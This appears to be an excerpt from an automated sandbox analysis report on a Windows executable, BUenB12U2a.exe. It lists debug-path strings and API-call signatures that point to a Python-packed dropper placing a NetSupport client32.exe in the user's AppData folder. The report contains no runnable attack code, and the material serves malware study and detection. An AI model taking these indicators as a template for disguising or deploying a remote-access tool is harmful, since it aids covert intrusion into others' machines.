                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716606223.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712853031.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714026120.0000021D6886A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715513195.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972151598.00007FFE126EC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714286119.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1713191627.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713191627.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713264817.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715858737.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713390708.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716606223.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713122564.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713469829.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715337207.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714619958.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.1971040442.00007FFE01428000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714026120.0000021D6886A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1711310620.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973727085.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713821207.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714452192.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716529790.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1714204693.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712987011.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713747367.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713821207.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713960779.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000001.00000002.1972917021.00007FFE13203000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714373322.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712853031.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716303770.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716684625.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714537738.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713600901.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714373322.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.1970527009.00007FFE007E4000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716027866.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716529790.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.1971670119.00007FFE11EAD000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716134858.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713884666.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716456872.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB179000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1711310620.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973727085.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715602426.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714537738.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713533133.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1797924656.0000021011988000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797924656.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1798504683.0000021011988000.00000004.00000020.00020000.00000000.sdmp, client32.exe
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716224988.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713469829.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715430142.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1971483273.00007FFE11517000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713056195.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714111041.0000021D68869000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713122564.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713264817.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714619958.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715779957.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716303770.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715602426.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1712921749.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1973122343.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713056195.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1798201497.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1798361127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1971951478.00007FFE11ED8000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715779957.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716456872.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000001.00000002.1965803034.00007FFDFADC0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB211000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.1970527009.00007FFE007E4000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713321376.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714286119.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1712921749.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715691868.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716224988.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.1966827641.00007FFDFB211000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713600901.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.1967696079.00007FFDFB65B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716134858.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716684625.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715430142.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715513195.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714452192.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713390708.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972151598.00007FFE126EC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1713747367.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1972663223.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1713680258.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713960779.0000021D68862000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716385209.0000021D68864000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1799122999.000002101120B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799328127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.0000021011130000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799122999.00000210111CB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714204693.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000001.00000002.1959274900.0000021010910000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715691868.0000021D6886B000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF92F0 FindFirstFileExW,FindClose,0_2_00007FF748AF92F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF748AF83B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF92F0 FindFirstFileExW,FindClose,1_2_00007FF748AF92F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF748AF83B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01370340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFE01370340
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01340DA8 FindFirstFileExW,GetLastError,1_2_00007FFE01340DA8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013F260C FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFE013F260C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ACA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6C5ACA9B
